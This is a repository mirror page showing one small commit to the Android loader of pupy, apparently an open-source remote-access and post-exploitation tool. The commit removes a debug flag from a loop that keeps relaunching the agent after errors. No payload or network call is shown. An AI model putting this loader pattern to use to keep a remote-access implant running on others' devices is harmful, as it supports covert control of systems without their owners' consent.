mirror of https://github.com/n1nj4sec/pupy.git
p4a loader: remove debug
This commit is contained in:
parent
3ea43e50f9
commit
23165e6ff6
|
@ -18,7 +18,7 @@ if __name__ == '__main__':
|
||||||
|
|
||||||
while True:
|
while True:
|
||||||
try:
|
try:
|
||||||
pp.main(debug=True)
|
pp.main()
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
import traceback
|
import traceback
|
||||||
traceback.print_exc()
|
traceback.print_exc()
|
||||||
|
|
Loading…
Reference in New Issue